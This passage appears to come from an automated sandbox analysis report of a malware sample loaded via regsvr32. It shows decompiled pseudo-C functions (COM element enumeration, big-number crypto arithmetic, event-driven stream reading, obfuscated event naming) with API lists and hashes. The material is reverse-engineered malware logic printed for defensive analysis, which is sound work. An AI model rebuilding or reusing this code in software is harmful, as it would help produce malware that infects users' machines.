                                                                                                                                                                                                                                    				intOrPtr* _t58;
                                                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                    				intOrPtr* _t63;
                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                                                    				intOrPtr* _t74;
                                                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                                                    				intOrPtr _t78;
                                                                                                                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                                    				void* _t122;
                                                                                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t122 = _t121 - 0x3c;
                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                                    				if(_t117 >= 0) {
                                                                                                                                                                                                                                    					_t54 = _v8;
                                                                                                                                                                                                                                    					_t102 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t5 = _t102 + 0x23ee038; // 0x3050f485
                                                                                                                                                                                                                                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                                    					_t56 = _v8;
                                                                                                                                                                                                                                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                                    					if(_t117 >= 0) {
                                                                                                                                                                                                                                    						__imp__#2(0x23ec2b0);
                                                                                                                                                                                                                                    						_v28 = _t57;
                                                                                                                                                                                                                                    						if(_t57 == 0) {
                                                                                                                                                                                                                                    							_t117 = 0x8007000e;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t60 = _v32;
                                                                                                                                                                                                                                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                                    							_t86 = __imp__#6;
                                                                                                                                                                                                                                    							_t117 = _t61;
                                                                                                                                                                                                                                    							if(_t117 >= 0) {
                                                                                                                                                                                                                                    								_t63 = _v24;
                                                                                                                                                                                                                                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                                    								if(_t117 >= 0) {
                                                                                                                                                                                                                                    									_t129 = _v20;
                                                                                                                                                                                                                                    									if(_t129 != 0) {
                                                                                                                                                                                                                                    										_v64 = 3;
                                                                                                                                                                                                                                    										_v48 = 3;
                                                                                                                                                                                                                                    										_v56 = 0;
                                                                                                                                                                                                                                    										_v40 = 0;
                                                                                                                                                                                                                                    										if(_t129 > 0) {
                                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                                    												_t67 = _v24;
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												_t122 = _t122;
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												asm("movsd");
                                                                                                                                                                                                                                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                                                                                                                                                                                                    												if(_t117 < 0) {
                                                                                                                                                                                                                                    													goto L16;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t69 = _v8;
                                                                                                                                                                                                                                    												_t108 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    												_t28 = _t108 + 0x23ee0bc; // 0x3050f1ff
                                                                                                                                                                                                                                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                                                                                                                                                                                                    												if(_t117 >= 0) {
                                                                                                                                                                                                                                    													_t74 = _v16;
                                                                                                                                                                                                                                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                                                                                                                                                                                                    													if(_t117 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                    														_t78 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    														_t33 = _t78 + 0x23ee078; // 0x76006f
                                                                                                                                                                                                                                    														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                                    															_t82 = _v16;
                                                                                                                                                                                                                                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														 *_t86(_v12);
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													_t76 = _v16;
                                                                                                                                                                                                                                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t71 = _v8;
                                                                                                                                                                                                                                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                                                                                                                                    												_v40 = _v40 + 1;
                                                                                                                                                                                                                                    												if(_v40 < _v20) {
                                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L16;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                    								_t65 = _v24;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							 *_t86(_v28);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 = _v32;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t117;
                                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                                    0x023e533e
                                                                                                                                                                                                                                    0x023e548b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(023EC2B0), ref: 023E5349
                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 023E542B
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E5444
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E5473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1885612795-0
                                                                                                                                                                                                                                    • Opcode ID: 9c1365c35febf9cbd4ba0dfbfdecdf3e113b7e5837d7222a81e700f8894e5f32
                                                                                                                                                                                                                                    • Instruction ID: 613e51d980117abe2802b5f0abab0999d50f119891bf0ae4f05c006dfb4faf94
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c1365c35febf9cbd4ba0dfbfdecdf3e113b7e5837d7222a81e700f8894e5f32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53513C71E00519EFCF10DFA8C4889AEB7BAEF88709B148598E916EB250D7719D05CFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E023E1017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				void _v92;
                                                                                                                                                                                                                                    				void _v236;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    				unsigned int _t56;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                    				void* _t92;
                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                    				signed int* _t99;
                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                                                    				void* _t107;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t92 = _a12;
                                                                                                                                                                                                                                    				_t101 = __eax;
                                                                                                                                                                                                                                    				_t55 = E023EA7AA(_a16, _t92);
                                                                                                                                                                                                                                    				_t79 = _t55;
                                                                                                                                                                                                                                    				if(_t79 == 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t55;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                                    				_t81 = 0;
                                                                                                                                                                                                                                    				_t96 = 0x20;
                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					_t97 = _t96 - _t81;
                                                                                                                                                                                                                                    					_v12 = _t96 - _t81;
                                                                                                                                                                                                                                    					E023E968F(_t79,  &_v236);
                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E023E8967(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                                                                                                                    					E023E8967(_t79,  &_v92, _a12, _t97);
                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                                                                                                                    					_t66 = E023E968F(_t101, 0x23ed1b0);
                                                                                                                                                                                                                                    					_t103 = _t101 - _t79;
                                                                                                                                                                                                                                    					_a8 = _t103;
                                                                                                                                                                                                                                    					if(_t103 < 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						E023E968F(_a16, _a4);
                                                                                                                                                                                                                                    						E023E1D6C(_t79,  &_v236, _a4, _t97);
                                                                                                                                                                                                                                    						memset( &_v236, 0, 0x8c);
                                                                                                                                                                                                                                    						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                                                                                                                    						goto L18;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push( *_t99);
                                                                                                                                                                                                                                    							L023EB0C8();
                                                                                                                                                                                                                                    							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                                    							asm("adc edx, esi");
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push(_v8 + 1);
                                                                                                                                                                                                                                    							_push(_t92);
                                                                                                                                                                                                                                    							_push(_t74);
                                                                                                                                                                                                                                    							L023EB0C2();
                                                                                                                                                                                                                                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                    								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                    								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t74 =  *_t99;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                                                                                                                    						_a12 = _t74;
                                                                                                                                                                                                                                    						_t76 = E023E1FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                    							_t92 =  &_v92;
                                                                                                                                                                                                                                    							if(E023E8B62(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							_a12 = _a12 + 1;
                                                                                                                                                                                                                                    							_t76 = E023E9100(_t79,  &_v92, _t106, _t106);
                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_a8 = _a8 - 1;
                                                                                                                                                                                                                                    						_t66 = _a12;
                                                                                                                                                                                                                                    						_t99 = _t99 - 4;
                                                                                                                                                                                                                                    						 *(0x23ed1b0 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                    					} while (_a8 >= 0);
                                                                                                                                                                                                                                    					_t97 = _v12;
                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				while(_t81 < _t96) {
                                                                                                                                                                                                                                    					_t81 = _t81 + 1;
                                                                                                                                                                                                                                    					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 023E10C4
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 023E10DA
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E117A
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E118A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3041852380-0
                                                                                                                                                                                                                                    • Opcode ID: 471187063a0d9cbb9e7f197f3afc9dfb86aa74682a89a9c9410a4fb847089b11
                                                                                                                                                                                                                                    • Instruction ID: b766a3093b39bd1bfe95ac63e294b63ecb21fa5139948545ae24ed605c4cfed3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 471187063a0d9cbb9e7f197f3afc9dfb86aa74682a89a9c9410a4fb847089b11
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D418171A00269ABDF20DEA8DC44BEE777AEF44310F108529E95BA72C0D770AD5D8F90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000008,76D24D40), ref: 023EA9BD
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023EAA31
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EAA54
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EAAFF
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 943265810-0
                                                                                                                                                                                                                                    • Opcode ID: 07baa49147a1cbb26dd7f2ee41dce3605148e94b61aac0a8a68d664581aa22af
                                                                                                                                                                                                                                    • Instruction ID: 2da8e723362c551bdcf6cef5bd63a5fd44c90e427efdd4b83024760beec1f6e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07baa49147a1cbb26dd7f2ee41dce3605148e94b61aac0a8a68d664581aa22af
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E44148B1940208BBDF319FA5DC88EAB7BBDEF89704F004929F153E50D0E771A959DA20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                                                                                                    			E023E39BF(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t37;
                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                    				long _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t53 = __ecx;
                                                                                                                                                                                                                                    				_t59 = __eax;
                                                                                                                                                                                                                                    				_t58 = 0;
                                                                                                                                                                                                                                    				ResetEvent( *(__eax + 0x1c));
                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                    				_push(4);
                                                                                                                                                                                                                                    				_push( &_v20);
                                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                                                    				if( *0x23ed134() != 0) {
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                    						return _t58;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x23ed168(0, 1,  &_v12);
                                                                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                                                                    						_t58 = 8;
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t36 = E023E2049(0x1000);
                                                                                                                                                                                                                                    					_v16 = _t36;
                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                    						_t58 = 8;
                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                    						_t37 = _v12;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_push( &_v20);
                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                    						_t39 = _v12;
                                                                                                                                                                                                                                    						_t56 =  *_t39;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                                                                                                                                                                                                    						ResetEvent( *(_t59 + 0x1c));
                                                                                                                                                                                                                                    						_push( &_v8);
                                                                                                                                                                                                                                    						_push(0x1000);
                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                                                    						if( *0x23ed134() != 0) {
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 = GetLastError();
                                                                                                                                                                                                                                    						if(_t58 != 0x3e5) {
                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                    							E023E9039(_v16);
                                                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                                                    								_t58 = E023E7A07(_v12, _t59);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 = E023E1C47( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						_t58 = 0;
                                                                                                                                                                                                                                    						if(_v8 == 0) {
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						_push(_v8);
                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 = GetLastError();
                                                                                                                                                                                                                                    				if(_t58 != 0x3e5) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					if(_t58 != 0) {
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 = E023E1C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                                                                                                                                                                                                    				if(_t58 != 0) {
                                                                                                                                                                                                                                    					goto L21;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023E39D5
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023E39EE
                                                                                                                                                                                                                                      • Part of subcall function 023E1C47: WaitForMultipleObjects.KERNEL32(00000002,023EAA72,00000000,023EAA72,?,?,?,023EAA72,0000EA60), ref: 023E1C62
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023E3A67
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023E3A82
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2394032930-0
                                                                                                                                                                                                                                    • Opcode ID: 520e7cb231e85d935ed184b9584c7ec27547b3f51f4a2e0f7e017b3b221a4c06
                                                                                                                                                                                                                                    • Instruction ID: 73c34d6f2d799dcda6467d2162a06f66d000699eadbb7f02267c779361a8862d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 520e7cb231e85d935ed184b9584c7ec27547b3f51f4a2e0f7e017b3b221a4c06
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C319032A00614EBCF21DBA5CC44B7EB7BDAF88364F1005A9E557A75D0EB30E989DB10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E023E42EA(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				signed int _t6;
                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				short* _t19;
                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				signed int* _t28;
                                                                                                                                                                                                                                    				CHAR* _t30;
                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t6 =  *0x23ed270; // 0xd448b889
                                                                                                                                                                                                                                    				_t32 = _a4;
                                                                                                                                                                                                                                    				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                                    				_t8 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    				_t3 = _t8 + 0x23ee862; // 0x61636f4c
                                                                                                                                                                                                                                    				_t25 = 0;
                                                                                                                                                                                                                                    				_t30 = E023E7A9A(_t3, 1);
                                                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                                                    					_t25 = CreateEventA(0x23ed2a8, 1, 0, _t30);
                                                                                                                                                                                                                                    					E023E9039(_t30);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 =  *0x23ed25c; // 0x4000000a
                                                                                                                                                                                                                                    				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E023E757F() != 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t28 = _a8;
                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                    						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t31 = E023E205E(_t32, _t26);
                                                                                                                                                                                                                                    					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                    						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t19 =  *0x23ed0f0( *_t32, 0x20);
                                                                                                                                                                                                                                    					if(_t19 != 0) {
                                                                                                                                                                                                                                    						 *_t19 = 0;
                                                                                                                                                                                                                                    						_t19 = _t19 + 2;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t31 = E023EA501(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                    						if(_t25 == 0) {
                                                                                                                                                                                                                                    							L22:
                                                                                                                                                                                                                                    							return _t31;
                                                                                                                                                                                                                                    						}
